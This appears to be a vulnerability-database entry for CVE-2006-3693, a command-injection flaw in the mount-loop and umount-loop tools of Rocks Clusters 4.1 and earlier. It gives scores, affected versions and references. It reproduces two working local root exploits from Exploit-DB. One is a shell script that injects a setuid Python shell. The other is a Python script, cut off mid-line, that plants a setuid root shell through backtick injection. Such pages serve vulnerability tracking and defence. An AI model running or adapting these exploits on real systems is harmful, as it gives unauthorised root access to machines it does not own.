CVE-2006-3693
published 2006-07-21CVE-2006-3693: Rocks Clusters 4.1 and earlier allows local users to gain privileges via commands enclosed with escaped backticks (\`) in an argument to the (1) mount-loop…
PriorityP421medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
0.93%
56.2th percentile
Rocks Clusters 4.1 and earlier allows local users to gain privileges via commands enclosed with escaped backticks (\`) in an argument to the (1) mount-loop (mount-loop.c) or (2) umount-loop (umount-loop.c) command, which is not filtered in a system function call.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rocks_clusters | rocks_clusters | <= 4.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation
exploitdb·2006-07-15
CVE-2006-3693 Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation
Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation
---
#!/bin/sh
##############################################################################
## rocksmountdirty.sh: Rocks release <=4.1 local root exploit
## make sure 'mount-loop' is in your path for this to work.
##
## coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"
# milw0rm.com [2006-07-15]
Exploit-DB
Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation
exploitdb·2006-07-15
CVE-2006-3693 Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation
Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation
---
#!/usr/bin/env python
##############################################################################
## rocksumountdirty.py: Rocks release <=4.1 local root exploit
## quick and nasty version of the exploit. make sure the . is writable and
## you clean up afterwards. ;)
##
## coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/s
No writeups or analysis indexed.
http://secunia.com/advisories/21065http://securityreason.com/securityalert/1242http://www.securityfocus.com/archive/1/440126/100/0/threadedhttp://www.securityfocus.com/bid/19003http://www.vupen.com/english/advisories/2006/2833http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txthttp://xavier.tigerteam.se/exploits/rocksmountdirty.shhttp://xavier.tigerteam.se/exploits/rocksumountdirty.pyhttps://exchange.xforce.ibmcloud.com/vulnerabilities/27758http://secunia.com/advisories/21065http://securityreason.com/securityalert/1242http://www.securityfocus.com/archive/1/440126/100/0/threadedhttp://www.securityfocus.com/bid/19003http://www.vupen.com/english/advisories/2006/2833http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txthttp://xavier.tigerteam.se/exploits/rocksmountdirty.shhttp://xavier.tigerteam.se/exploits/rocksumountdirty.pyhttps://exchange.xforce.ibmcloud.com/vulnerabilities/27758
2006-07-21
Published